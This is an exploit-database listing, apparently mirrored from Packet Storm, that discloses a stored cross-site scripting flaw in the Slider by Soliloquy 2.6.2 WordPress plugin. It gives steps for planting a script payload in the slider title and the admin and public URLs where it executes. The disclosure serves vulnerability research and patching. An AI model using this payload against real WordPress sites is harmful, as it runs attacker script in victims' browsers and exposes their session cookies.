Exploit for WordPress Slider By Soliloquy 2.6.2 Cross Site Scripting

Name: Exploit for WordPress Slider By Soliloquy 2.6.2 Cross Site Scripting
Rating: 5 (255 reviews)

2021-12-03 | CVSS -0.6

## https://sploitus.com/exploit?id=PACKETSTORM:165149
# Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)  
# Date: 02/12/2021  
# Exploit Author: Abdurrahman Erkan (@erknabd)  
# Vendor Homepage: https://soliloquywp.com/  
# Software Link: https://wordpress.org/plugins/soliloquy-lite/  
# Version: 2.6.2  
# Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2  
  
# Proof of Concept:  
#  
# 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.  
# 2- Open Soliloquy and use "Add New" button to add new post.  
# 3- Add payload to title. Payload: <script>alert(document.cookie)</script>  
# 4- Add any image in post.  
# 5- Publish the post.  
# 6- XSS has been triggered.  
#  
# Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.  
# Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.